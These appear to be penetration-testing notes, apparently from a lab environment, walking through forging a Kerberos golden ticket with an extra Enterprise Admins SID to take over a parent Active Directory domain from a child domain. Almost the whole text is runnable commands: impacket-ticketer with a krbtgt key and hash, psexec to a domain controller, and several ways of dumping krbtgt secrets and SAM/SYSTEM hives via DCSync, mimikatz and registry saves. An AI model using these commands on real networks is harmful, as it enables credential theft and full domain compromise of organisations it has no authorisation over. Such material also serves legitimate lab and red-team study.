Golden Ticket

craft ticket

impacket-ticketer -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991-519 Administrator -extra-pac

Access computer

export KRB5CCNAME="Administrator.ccache"

impacket-psexec sub.poseidon.yzx/Administrator@dc01.poseidon.yzx -k -no-pass -target-ip 192.168.126.161

Doc

Here's a breakdown of each parameter in the impacket-ticketer command for creating a golden ticket with SID history:

Command Breakdown:

1. -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2

• What: AES256 key of the krbtgt account
• How to get it:

  # From DCSync attack
  impacket-secretsdump -just-dc-user krbtgt domain/user:password@dc-ip
  
  # From mimikatz
  lsadump::dcsync /domain:sub.poseidon.yzx /user:krbtgt
  
  # From a DC with admin access
  reg save HKLM\SYSTEM system.hive
  reg save HKLM\SAM sam.hive
  impacket-secretsdump -sam sam.hive -system system.hive LOCAL

2. -domain sub.poseidon.yzx

• What: Your current domain name (child domain)
• How to get it:

  # PowerShell
  $env:USERDNSDOMAIN
  Get-ADDomain | Select Name, DNSRoot
  
  # CMD
  echo %USERDNSDOMAIN%
  nltest /dsgetdc:

3. -domain-sid S-1-5-21-4168247447-1722543658-2110108262

• What: SID of your current domain (sub.poseidon.yzx)
• How to get it:

  # PowerShell
  Get-ADDomain | Select DomainSID
  
  # Using wmic
  wmic useraccount where name="krbtgt" get sid
  
  # From any domain user SID (remove last digits)
  whoami /user

4. -extra-sid S-1-5-21-1190331060-1711709193-932631991-519

• What: Parent domain SID + 519 (Enterprise Admins)
• How to get it:

  # Get parent domain SID
  Get-ADDomain -Identity poseidon.yzx | Select DomainSID
  
  # Or from parent domain trust
  Get-ADTrust -Filter * | Select Name, TargetDomainSid
  
  # Common RIDs to append:
  # -519: Enterprise Admins
  # -512: Domain Admins
  # -500: Administrator

5. Administrator

• What: Username for the ticket
• Note: Can be any username, even non-existent ones

6. -extra-pac

• What: Include extra PAC (Privilege Attribute Certificate) data
• Purpose: Makes the ticket more complete and less likely to be rejected

Alternative with NTLM hash:

# Using NTLM hash instead of AES
impacket-ticketer -nthash b5d83edef61d3c3799047e208e13b2c7 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991-519 Administrator

Example to get all values:

# Get current domain info
Get-ADDomain | Select Name, DNSRoot, DomainSID

# Get parent domain info
Get-ADDomain -Server poseidon.yzx | Select Name, DNSRoot, DomainSID

# Get krbtgt hash (requires Domain Admin)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:sub.poseidon.yzx /user:krbtgt"'

This creates a golden ticket with Enterprise Admin privileges in the parent domain!